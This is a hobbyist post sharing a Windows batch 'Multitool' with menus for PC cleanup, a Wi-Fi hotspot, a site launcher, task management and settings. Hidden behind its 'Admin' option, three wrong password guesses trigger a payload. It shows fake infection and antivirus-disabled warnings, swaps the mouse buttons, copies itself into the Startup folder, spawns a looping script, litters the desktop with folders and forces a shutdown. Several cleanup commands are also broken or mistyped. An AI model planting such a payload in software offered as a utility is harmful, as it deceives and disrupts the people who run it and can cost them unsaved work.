Introduction: Multitool.bat Nice Functions
I made a Batch file with some (in my opinion Useful Codes) everyone that wants to can download this tool and use it but i would really appreciate if you guys would tell me in the comments what i could add and maybe even how (the code) because i want to have even more features in it but i dont know what you could add now?
I hope you guys like it ..and if you find something that doesn't work pls tell it to me so i can fix it :)
AND BTW. it was the first batch i've ever made
Step 1: The Code
@echo off
title Multitool by Oliver color 0a echo ------------------------------------------------------------------------ echo Welcome to my Multitool! echo ------------------------------------------------------------------------ echo. pause cls :Start cls COLOR %color% title Start echo The First thing you have to do is to choose what you want to do echo. echo Type the number to redirect to where you want to go. echo. echo 1) Hotspot erstellen echo 2) Site Redirector echo 3) Pc Cleanup echo 4) Power Management echo 5) Tasklist echo 6) Taskkill echo 7) Change Ip echo 8) Settings echo 9) Admin echo 10) CREDITS echo. set/p b= if %b%==1 GOTO A if %b%==2 GOTO C if %b%==3 GOTO D if %b%==4 GOTO Power if %b%==5 GOTO Taskl if %b%==6 GOTO Taskk if %b%==7 GOTO Ip if %b%==8 GOTO Settings if %b%==9 GOTO Admin if %b%==10 GOTO Credits pause :D cls title Cleanup V1 by Oliver echo -------------------------------------------------------------------------------- echo PC Cleanup Utility echo -------------------------------------------------------------------------------- echo. echo Select a tool echo ============= echo. echo [1] Delete Internet Cookies echo [2] Delete Temporary Internet Files echo [3] Disk Cleanup echo [4] Disk Defragment echo [5] Exit echo. set /p op=Run: if %op%==1 goto 1 if %op%==2 goto 2 if %op%==3 goto 3 if %op%==4 goto 4 if %op%==5 goto exit goto error pause :1 cls echo -------------------------------------------------------------------------------- echo Delete Internet Cookies echo -------------------------------------------------------------------------------- echo. echo Deleting Cookies... ping localhost -n 3 >nul del /f /q "%userprofile%\Cookies\*.*" cls echo -------------------------------------------------------------------------------- echo Delete Internet Cookies echo -------------------------------------------------------------------------------- echo. echo Cookies deleted. echo. echo Press any key to return to the menu. . . pause >nul goto Start :2 cls echo -------------------------------------------------------------------------------- echo Delete Temporary Internet Files echo -------------------------------------------------------------------------------- echo. echo Deleting Temporary Files... ping localhost -n 3 >nul del /f /q "%userprofile%\AppData\Local\Microsoft\Windows\Temporary Internet Files\*.*" cls echo -------------------------------------------------------------------------------- echo Delete Temporary Internet Files echo -------------------------------------------------------------------------------- echo. echo Temporary Internet Files deleted. echo. echo Press any key to return to the menu. . . pause >nul goto Start :3 cls echo -------------------------------------------------------------------------------- echo Disk Cleanup echo -------------------------------------------------------------------------------- echo. echo Running Disk Cleanup... ping localhost -n 3 >nul if exist "C:\WINDOWS\temp"del /f /q "C:WINDOWS\temp\*.*" if exist "C:\WINDOWS\tmp" del /f /q "C:\WINDOWS\tmp\*.*" if exist "C:\tmp" del /f /q "C:\tmp\*.*" if exist "C:\temp" del /f /q "C:\temp\*.*" if exist "%temp%" del /f /q "%temp%\*.*" if exist "%tmp%" del /f /q "%tmp%\*.*" if not exist "C:\WINDOWS\Users\*.*" goto skip if exist "C:\WINDOWS\Users\*.zip" del "C:\WINDOWS\Users\*.zip" /f /q if exist "C:\WINDOWS\Users\*.exe" del "C:\WINDOWS\Users\*.exe" /f /q if exist "C:\WINDOWS\Users\*.gif" del "C:\WINDOWS\Users\*.gif" /f /q if exist "C:\WINDOWS\Users\*.jpg" del "C:\WINDOWS\Users\*.jpg" /f /q if exist "C:\WINDOWS\Users\*.png" del "C:\WINDOWS\Users\*.png" /f /q if exist "C:\WINDOWS\Users\*.bmp" del "C:\WINDOWS\Users\*.bmp" /f /q if exist "C:\WINDOWS\Users\*.avi" del "C:\WINDOWS\Users\*.avi" /f /q if exist "C:\WINDOWS\Users\*.mpg" del "C:\WINDOWS\Users\*.mpg" /f /q if exist "C:\WINDOWS\Users\*.mpeg" del "C:\WINDOWS\Users\*.mpeg" /f /q if exist "C:\WINDOWS\Users\*.ra" del "C:\WINDOWS\Users\*.ra" /f /q if exist "C:\WINDOWS\Users\*.ram" del "C:\WINDOWS\Users\*.ram"/f /q if exist "C:\WINDOWS\Users\*.mp3" del "C:\WINDOWS\Users\*.mp3" /f /q if exist "C:\WINDOWS\Users\*.mov" del "C:\WINDOWS\Users\*.mov" /f /q if exist "C:\WINDOWS\Users\*.qt" del "C:\WINDOWS\Users\*.qt" /f /q if exist "C:\WINDOWS\Users\*.asf" del "C:\WINDOWS\Users\*.asf" /f /q :skip if not exist C:\WINDOWS\Users\Users\*.* goto skippy /f /q if exist C:\WINDOWS\Users\AppData\Temp\*.zip del C:\WINDOWS\Users\Users\*.zip /f /q if exist C:\WINDOWS\Users\AppData\Temp\*.exe del C:\WINDOWS\Users\Users\*.exe /f /q if exist C:\WINDOWS\Users\AppData\Temp\*.gif del C:\WINDOWS\Users\Users\*.gif /f /q if exist C:\WINDOWS\Users\AppData\Temp\*.jpg del C:\WINDOWS\Users\Users\*.jpg /f /q if exist C:\WINDOWS\Users\AppData\Temp\*.png del C:\WINDOWS\Users\Users\*.png /f /q if exist C:\WINDOWS\Users\AppData\Temp\*.bmp del C:\WINDOWS\Users\Users\*.bmp /f /q if exist C:\WINDOWS\Users\AppData\Temp\*.avi del C:\WINDOWS\Users\Users\*.avi /f /q if exist C:\WINDOWS\Users\AppData\Temp\*.mpg del C:\WINDOWS\Users\Users\*.mpg /f /q if exist C:\WINDOWS\Users\AppData\Temp\*.mpeg del C:\WINDOWS\Users\Users\*.mpeg /f /q if exist C:\WINDOWS\Users\AppData\Temp\*.ra del C:\WINDOWS\Users\Users\*.ra /f /q if exist C:\WINDOWS\Users\AppData\Temp\*.ram del C:\WINDOWS\Users\Users\*.ram /f /q if exist C:\WINDOWS\Users\AppData\Temp\*.mp3 del C:\WINDOWS\Users\Users\*.mp3 /f /q if exist C:\WINDOWS\Users\AppData\Temp\*.asf del C:\WINDOWS\Users\Users\*.asf /f /q if exist C:\WINDOWS\Users\AppData\Temp\*.qt del C:\WINDOWS\Users\Users\*.qt /f /q if exist C:\WINDOWS\Users\AppData\Temp\*.mov del C:\WINDOWS\Users\Users\*.mov /f /q :skippy if exist "C:\WINDOWS\ff*.tmp" del C:\WINDOWS\ff*.tmp /f /q if exist C:\WINDOWS\ShellIconCache del /f /q "C:\WINDOWS\ShellI~1\*.*" cls echo -------------------------------------------------------------------------------- echo Disk Cleanup echo -------------------------------------------------------------------------------- echo. echo Disk Cleanup successful! echo. pause goto Start
:4 cls echo -------------------------------------------------------------------------------- echo Disk Defragment echo -------------------------------------------------------------------------------- echo. echo Defragmenting hard disks... ping localhost -n 3 >nul defrag -c -v cls echo -------------------------------------------------------------------------------- echo Disk Defragment echo -------------------------------------------------------------------------------- echo. echo Disk Defrag successful! echo. pause goto Start :error cls echo Command not recognized. ping localhost -n 4 >nul goto Start :exit exit :C cls title Site Selector Beta COLOR %color% echo -------------------------------------------------------------------------------- echo. echo Site Selector echo. echo -------------------------------------------------------------------------------- echo. echo Key: echo (1) Google - Search Engine echo (2) Gmail - Popular Email Server echo (3) Youtube - Video Plattform echo (4) Weather - Weather echo (5) Netflix - Watch films and more echo (6) CodeBeautify - Encryption echo (7) InfoEncrypt - Encryption echo (8) Oliver's Site - Updates and other Stuff echo (9) Twitch - Streaming Plattform echo (10) Oliver's Twitch echo (11) Pornhub - Porn site echo (12) Xnxx - Porn site echo. echo (e) Exit echo (s) Start echo. echo -------------------------------------------------------------------------------- echo Enter the number of the website which you want to visit echo. set/p website= echo. echo -------------------------------------------------------------------------------- if %website%==1 start if %website%==2 start if %website%==3 start if %website%==4 start if %website%==5 start if %website%==6 start if %website%==7 start if %website%==8 goto comming if %website%==9 start if %website%==10 start if %webiste%==11 start if %website%==12 start if %website%==e GOTO exit if %website%==s GOTO Start cls echo -------------------------------------------------------------------------------- echo. echo More sites getting added soon. Oliver's Build v1 echo. echo -------------------------------------------------------------------------------- echo Type (e) to exit or (b) to go back and select another site. echo. set/p udefine= echo. echo -------------------------------------------------------------------------------- if %udefine%==b goto C if %udefine%==e goto exit pause :comming cls title Shit echo -------------------------------------------------------------------------------- echo. echo Oh you used a feature which isnt fully finished echo. echo The Function you tried to use is going to be added soon echo. echo -------------------------------------------------------------------------------- pause goto Start :A cls COLOR %color% title Hotspot Creator echo -------------------------------------------------------------------------------- echo. echo (1) Create Hotspot echo. COLOR %color% echo MAKE SURE THE BAT IS OPENED WITH ADMIN RIGHTS OTHERWISE IT WONT WORK!! echo. echo (e) Exit echo (s) go back to start echo. echo -------------------------------------------------------------------------------- set/p Hot= if %Hot%==1 goto Hot if %Hot%==e goto exit if %Hot%==s goto Start pause :Hot cls title Give it a Name echo -------------------------------------------------------------------------------- echo. echo What do you want to name your Hotspot? echo. echo -------------------------------------------------------------------------------- set/p name= goto Hot2 pause :Hot2 cls title Password echo -------------------------------------------------------------------------------- echo. echo What Password do you want to have for your Hotspot? MIND. 8 Characters Long!! echo. echo -------------------------------------------------------------------------------- set/p password= pause goto starthot :starthot cls netsh wlan set hostednetwork mode=allow ssid=%name% key=%Password% echo. echo. echo. echo Loading... pause goto starthot2 pause :starthot2 COLOR A0 netsh wlan start hostednetwork echo. echo. echo -------------------------------------------------------------------------------- echo. echo Worked echo. echo Now you still have to do something... Follow Step By Step! echo. echo Goto Control Panel echo Goto Network and Internet echo Open Network and Sharing Center echo Click Change adapter settings echo Right Click on the current connection echo Open Properties echo Goto Sharing echo click "Allow other network users to connect...." echo. echo. echo -------------------------------------------------------------------------------- pause goto ZDE :ZDE cls title Worked echo -------------------------------------------------------------------------------- echo. echo Your Hotspot should work fine now. echo. echo -------------------------------------------------------------------------------- echo. echo You can now: echo. echo (1)Go back to Start echo (2) Exit echo. echo -------------------------------------------------------------------------------- set/p ZDE= if %ZDE%==1 GOTO Start if %ZDE%==2 GOTO Exit pause :Power cls title Powermanagement Overview echo -------------------------------------------------------------------------------- echo. echo Press a key to see the options that are available for your pc. echo. echo -------------------------------------------------------------------------------- pause cls powercfg /a pause goto Start pause :Taskl cls Color %color% echo -------------------------------------------------------------------------------- echo. echo Press Enter to view your current Tasklist (it shows more then the Taskmanager does!!) echo. echo -------------------------------------------------------------------------------- pause cls tasklist pause goto Start :Taskk echo -------------------------------------------------------------------------------- echo. echo You need to know the Process ID of the task to kill it. echo (1)I dont know the Process ID echo (2)I know the Process ID and want to Continue echo. echo -------------------------------------------------------------------------------- set/p task= if %task%==1 GOTO Taskl if %task%==2 GOTO Taskk2 pause :Taskk2 cls title Taskkill! COLOR %color% echo You now need to write the Process ID! set/p pid= pause taskkill -pid %pid% pause goto Start :Settings cls title SETTINGS echo -------------------------------------------------------------------------------- echo. echo You can change : echo (1)Color echo (2)Comming soon! echo. echo. echo (s) Go back to Start echo (e) Exit echo. echo -------------------------------------------------------------------------------- set/p settinga= if %settinga%==1 GOTO ColorS if %settinga%==2 GOTO Comming if %settinga%==s GOTO Start if %settings%==e GOTO Exit pause :ColorS cls title Change Color echo -------------------------------------------------------------------------------- echo. echo The Colors you can change to are : echo. echo (1)Blue echo (2)Green echo (3)Aqua echo (4)Red echo (5)Purple echo (6)Yellow echo (7)White echo (8)Gray echo (9)Light Blue echo. echo You can also change the backround and the written. echo. echo (fc)Red Letters on White echo (14)Blue Letter on Red echo. echo -------------------------------------------------------------------------------- set/p color= pause cls title Well done echo -------------------------------------------------------------------------------- echo. echo WELL DONE echo. echo -------------------------------------------------------------------------------- pause goto Start :Admin cls COLOR %color% title Enter Password echo -------------------------------------------------------------------------------- echo. echo Enter Password, you have 3 Tries! echo. echo -------------------------------------------------------------------------------- set/p Pas1= if %Pas1%==oliver0815 GOTO Right if not %Pas1%==oliver0815 GOTO 2nd pause :Right cls title Right one COLOR %color% echo -------------------------------------------------------------------------------- echo. echo Joa noch kann man hier nichts machen lol wollte nur ne Passwort abfrage testen xD echo. echo -------------------------------------------------------------------------------- pause GOTO Start :2nd cls COLOR %color% title Wrong 2ND TRY echo -------------------------------------------------------------------------------- echo. echo Enter Password, you have 2 Tries left! echo. echo -------------------------------------------------------------------------------- set/p Pas2= if %Pas2%==oliver0815 GOTO Right if not %Pas2%==oliver0815 GOTO 3Try pause :3Try cls COLOR 4 title Last TRY!! echo -------------------------------------------------------------------------------- echo. echo Enter Password, last try! echo. echo -------------------------------------------------------------------------------- set/p Pas3= if %Pas3%==oliver0815 GOTO Right if not %Pas3%==oliver0815 GOTO Selfd pause :Selfd cls COLOR 4 title YOU DID SOMETHING WRONG pause goto Funny :Funny cls echo. echo Ihr Computer wurde infiziert! timeout -t 2 >nul COLOR 2D mode 35,40 ping -n 0 -w 1000 > nul mode 36,41 ping -n 0 -w 1000 > nul mode 37,42 ping -n 0 -w 1000 > nul mode 38,43 ping -n 0 -w 1000 > nul mode 39,44 ping -n 0 -w 1000 > nul mode 40,45 ping -n 0 -w 1000 > nul mode 41,46 ping -n 0 -w 1000 > nul mode 42,47 ping -n 1 -w 1000 > nul echo Ihr Computer wurde infiziert! echo. echo Sie sind leider nicht autorisiert :'( echo. echo. timeout -t 2 >nul start calc.exe start calc.exe start calc.exe start calc.exe mode 43,48 ping -n 0 -w 1000 > nul mode 44,49 ping -n 0 -w 1000 > nul mode 45,50 ping -n 0 -w 1000 > nul mode 46,51 ping -n 0 -w 1000 > nul mode 47,52 ping -n 0 -w 1000 > nul mode 48,53 ping -n 0 -w 1000 > nul mode 49,54 ping -n 0 -w 1000 > nul mode 50,55 ping -n 0 -w 1000 > nul mode 51,56 ping -n 0 -w 1000 > nul mode 52,57 ping -n 0 -w 1000 > nul mode 53,58 start cmd.exe Rundll32 user32, SwapMouseButton copy %0 "%userprofile%\STARTM~1\Programs\Startup" > nul cd %userprofile%\desktop\ ping -n 1 -w 1500 > nul ping -n 0 -w 1000 > nul mode 48,53 ping -n 0 -w 1000 > nul mode 47,52 ping -n 0 -w 1000 > nul mode 46,51 ping -n 0 -w 1000 > nul mode 45,50 ping -n 0 -w 1000 > nul mode 44,49 ping -n 0 -w 1000 > nul mode 43,48 ping -n 0 -w 1000 > nul mode 42,47 ping -n 0 -w 1000 > nul mode 41,46 ping -n 0 -w 1000 > nul mode 40,45 ping -n 0 -w 1000 > nul mode 39,44 ping -n 0 -w 1000 > nul mode 38,43 ping -n 0 -w 1000 > nul mode 37,42 ping -n 0 -w 1000 > nul mode 36,41 md "%RANDOM%" > nul md "%RANDOM%" > nul md "%RANDOM%" > nul md "%RANDOM%" > nul md "%RANDOM%" > nul md "%RANDOM%" > nul echo. echo Guck auf deinen Desktop :O timeout -t 2 > nul ping -n 0 -w 1000 > nul mode 48,53 ping -n 0 -w 1000 > nul mode 47,52 ping -n 0 -w 1000 > nul mode 46,51 ping -n 0 -w 1000 > nul mode 45,50 ping -n 0 -w 1000 > nul mode 44,49 ping -n 0 -w 1000 > nul mode 43,48 ping -n 0 -w 1000 > nul mode 42,47 echo. echo Achtung: Windows-Firewall deaktiviert! echo. echo Achtung: Antivirus deaktivert! timeout -t 2 >nul mode 43,48 ping -n 0 -w 1000 > nul mode 44,49 ping -n 0 -w 1000 > nul mode 45,50 ping -n 0 -w 1000 > nul mode 46,51 ping -n 0 -w 1000 > nul mode 47,52 ping -n 0 -w 1000 > nul mode 48,53 ping -n 0 -w 1000 > nul mode 49,54 ping -n 0 -w 1000 > nul mode 50,55 ping -n 0 -w 1000 > nul mode 51,56 ping -n 0 -w 1000 > nul mode 52,57 ping -n 0 -w 1000 > nul mode 53,58 echo. echo Ihr System verbindet sich nun mit dem Internet... start md "Batch Ordner" cd Batch Ordner echo @echo off > "Lol.txt.bat" echo :loop >> "Lol.txt.bat" echo mode 43,48 >> "Lol.txt.bat" echo ping -n 0 -w 1000 > nul >> "Lol.txt.bat" echo mode 44,49 >> "Lol.txt.bat" echo ping -n 0 -w 1000 > nul >> "Lol.txt.bat" echo mode 45,50 >> "Lol.txt.bat" echo ping -n 0 -w 1000 > nul >> "Lol.txt.bat" echo mode 46,51 >> "Lol.txt.bat" echo ping -n 0 -w 1000 > nul >> "Lol.txt.bat" echo mode 47,52 >> "Lol.txt.bat" echo ping -n 0 -w 1000 > nul >> "Lol.txt.bat" echo mode 46,51 >> "Lol.txt.bat" echo ping -n 0 -w 1000 > nul >> "Lol.txt.bat" echo mode 45,50 >> "Lol.txt.bat" echo ping -n 0 -w 1000 > nul >> "Lol.txt.bat" echo mode 44,49 >> "Lol.txt.bat" echo ping -n 0 -w 1000 > nul >> "Lol.txt.bat" echo mode 43,48 >> "Lol.txt.bat" echo ping -n 0 -w 1000 > nul >> "Lol.txt.bat" echo goto loop > nul >> "Lol.txt.bat" start Lol.txt.bat cd %userprofile%\desktop\ echo War doch nur ein kleiner Scherz ;) > "Liesmich.txt" cls echo. echo LOL echo. echo Schau auf deinen Desktop :P shutdown -s -t 20 pause GOTO exit :Ip cls COLOR 4 echo -------------------------------------------------------------------------------- echo. echo Make sure you're running this batch as Admin echo. echo -------------------------------------------------------------------------------- pause GOTO IP2 :Ip2 cls COLOR %color% echo -------------------------------------------------------------------------------- echo Ip config list! echo -------------------------------------------------------------------------------- pause ipconfig /all pause ipconfig /renew pause cls echo -------------------------------------------------------------------------------- echo. echo (s)Go back to start echo (e)Exit echo. echo -------------------------------------------------------------------------------- set/p ip= if %ip%==s GOTO Start if %ip%==e GOTO Exit pause :Credits cls Color 8f echo -------------------------------------------------------------------------------- echo. echo This Batch file took about 4Hours (till now) and was made by a noname called Oliver echo i did this out of pure fun because i wanted to start learning how to code and Batch echo is very easy thats why i started with it. echo if i made writing mistakes or something else doesn't makes sense im sry but im from echo germany and not from england so my english isnt the best. echo. echo if you want to you can check out my Youtube/Twitch/Instagram echo i would really appreciate it.And i have to say that not everything in this Menu echo was made by me (only 2 things not). echo. echo -------------------------------------------------------------------------------- echo. echo Direct Links echo (1) My Instagram echo (2) My Youtube echo (3) My Twitch echo (e) Exit echo. echo -------------------------------------------------------------------------------- set/p cred= if %cred%==1 Start if %cred%==2 Start if %cred%==3 Start if %cred%==e GOTO Exit pause GOTO Credits